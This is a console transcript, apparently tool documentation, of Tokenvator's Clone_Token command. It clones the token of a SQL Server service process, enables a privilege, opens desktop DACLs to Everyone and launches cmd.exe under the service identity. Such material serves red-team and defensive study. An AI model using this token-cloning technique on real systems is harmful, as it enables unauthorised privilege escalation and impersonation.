C:\>Tokenvator.exe Clone_Token /Process:3824 /Command:cmd.exe
(Tokens) >
Option Value
------ -----
process 3824
command cmd.exe
[+] 3824 sqlservr
[*] Command: cmd.exe
[*] Arguments:
[*] If the above doesn't look correct you may need quotes
[+] SeCreateTokenPrivilege is present and enabled on the token
[-] SeSecurityPrivilege is not enabled on the token
[*] Enabling SeSecurityPrivilege on the token
[*] Adjusting Token Privilege SeSecurityPrivilege => SE_PRIVILEGE_ENABLED
[+] Recieved luid
[*] AdjustTokenPrivilege
[+] Adjusted Privilege: SeSecurityPrivilege
[+] Privilege State: SE_PRIVILEGE_ENABLED
[*] Recieved Process Handle 0x02E4
[*] Recieved Token Handle 0x02E8
[+] Source: Advapi
[+] User:
S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER
[+] Enumerated 12 Groups:
S-1-16-12288 Some or all identity references could not be translated.
S-1-1-0 Everyone
S-1-5-21-258464558-1780981397-2849438727-1005 DESKTOP-J5KC1AR\PdwComputeNodeAccess
S-1-5-32-558 BUILTIN\Performance Monitor Users
S-1-5-32-545 BUILTIN\Users
S-1-5-11 NT AUTHORITY\Authenticated Users
S-1-5-15 NT AUTHORITY\This Organization
S-1-5-5-0-217494 Some or all identity references could not be translated.
S-1-2-0 LOCAL
[*] Enumerating Token Privileges
[*] GetTokenInformation (TokenPrivileges) - Pass 1
[*] GetTokenInformation - Pass 2
[+] Enumerated 9 Privileges
Privilege Name Enabled
-------------- -------
SeAssignPrimaryTokenPrivilege False
SeIncreaseQuotaPrivilege False
SeShutdownPrivilege False
SeChangeNotifyPrivilege True
SeUndockPrivilege False
SeImpersonatePrivilege True
SeCreateGlobalPrivilege True
SeIncreaseWorkingSetPrivilege False
SeTimeZonePrivilege False
[+] Owner:
S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER
[+] Primary Group:
S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER
[+] ACL Count: 659
[*] Updating Desktop DACL
[+] hDesktop : 0x02F0
[+] Recieved DACL : 0x293CC0284C4
[+] Create Everyone Sid - Pass 1 : 0x000C
[+] Create Everyone Sid - Pass 2 : 0x293CC03F530
[+] Added Everyone to DACL : 0x293CC03A0B0
[+] Applied DACL to Object
[+] hWinSta0 : 0x0318
[+] Recieved DACL : 0x293CC04B8B4
[+] Create Everyone Sid - Pass 1 : 0x000C
[+] Create Everyone Sid - Pass 2 : 0x293CC03F610
[+] Added Everyone to DACL : 0x293CC053400
[+] Applied DACL to Object
[*] CreateProcessWithTokenW
[+] Created process: 7140
[+] Created thread: 11228
Like Create_Token, Clone_Token requires SeCreateTokenPrivilege